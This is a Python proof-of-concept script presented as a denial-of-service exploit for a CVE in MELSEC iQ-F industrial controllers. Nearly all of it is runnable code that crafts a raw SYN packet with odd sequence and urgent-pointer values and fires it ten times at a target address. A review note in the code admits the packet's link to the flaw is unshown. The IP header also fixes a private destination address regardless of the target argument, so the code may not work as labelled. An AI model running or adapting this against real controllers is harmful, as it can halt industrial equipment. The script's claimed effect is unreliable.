#!/usr/bin/env python3
"""
CVE-2025-10259 PoC - MELSEC iQ-F TCP DoS
Note: This is for educational and authorized testing purposes only.
"""
import socket
import struct
import sys
def create_malformed_tcp_packet():
    """Build the fixed 40-byte IPv4 + TCP header pair this PoC transmits.

    The result is a 20-byte IPv4 header followed by a 20-byte TCP header with
    no options and no payload. Every field is a literal: nothing is derived
    from caller input, and both checksum fields are left at zero.

    What a network sensor would see in the TCP header: only SYN set, a
    sequence number of 0xFFFFFFFF, and an urgent pointer of 0xFFFF with the
    URG flag clear. A non-zero urgent pointer without URG is typically
    uncommon in ordinary traffic.

    NOTE(review): 0xFFFFFFFF is a legal TCP sequence number, and this page
    does not show how either field maps to the flaw the CVE describes. Check
    the vendor advisory before treating a result obtained with this packet as
    evidence that a device is or is not affected.

    Returns:
        bytes: the IPv4 header immediately followed by the TCP header.
    """
    # IPv4 header: both addresses are fixed private-range literals.
    src_addr = socket.inet_aton('192.168.1.100')
    dst_addr = socket.inet_aton('192.168.1.200')
    ip_fields = (
        0x45,      # version 4, header length 5 words
        0x00,      # type of service
        40,        # total length: 20-byte IP header + 20-byte TCP header
        0x0000,    # identification
        0x4000,    # flags / fragment offset
        64,        # time to live
        6,         # protocol number for TCP
        0x0000,    # header checksum, left at zero
        src_addr,
        dst_addr,
    )
    ip_part = struct.pack('!BBHHHBBH4s4s', *ip_fields)

    # TCP header: 20 bytes, no options.
    tcp_fields = (
        12345,        # source port
        5000,         # destination port (labelled "MELSEC default" by the PoC author)
        0xFFFFFFFF,   # sequence number
        0x00000000,   # acknowledgement number
        5 << 4,       # data offset of 5 words in the high nibble
        0x02,         # flags: SYN only
        8192,         # window
        0x0000,       # checksum, left at zero
        0xFFFF,       # urgent pointer (URG flag is not set)
    )
    tcp_part = struct.pack('!HHLLBBHHH', *tcp_fields)

    return ip_part + tcp_part
def exploit(target_ip, target_port=5000):
    """Transmit the fixed PoC packet ten times over a raw IPv4 socket.

    Args:
        target_ip: address passed to ``sendto``.
        target_port: port passed to ``sendto`` and echoed in the banner;
            defaults to 5000.

    The packet bytes come from ``create_malformed_tcp_packet()`` and are
    built once, so all ten sends are byte-identical. That burst of identical
    segments is what this function leaves in a packet capture.

    Opening a raw socket normally requires elevated privileges. That call
    sits outside the ``try``, so a failure there propagates to the caller.
    Errors from an individual send are printed and the loop continues, and
    the closing message is printed whether or not any send succeeded.
    """
    print(f'[*] Target: {target_ip}:{target_port}')
    print('[*] Sending malformed TCP packets...')

    raw_sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
    payload = create_malformed_tcp_packet()

    for attempt in range(1, 11):
        try:
            raw_sock.sendto(payload, (target_ip, target_port))
            print(f'[+] Packet {attempt} sent')
        except Exception as err:
            print(f'[-] Error: {err}')

    print('[*] Attack completed')
    raw_sock.close()
if __name__ == '__main__':
    # Command line: <target_ip> is required, [port] is optional (default 5000).
    cli_args = sys.argv
    if len(cli_args) < 2:
        print(f'Usage: {cli_args[0]} <target_ip> [port]')
        sys.exit(1)

    target = cli_args[1]
    # int() raises ValueError on a non-numeric port; no range check is done here.
    if len(cli_args) > 2:
        port = int(cli_args[2])
    else:
        port = 5000

    exploit(target, port)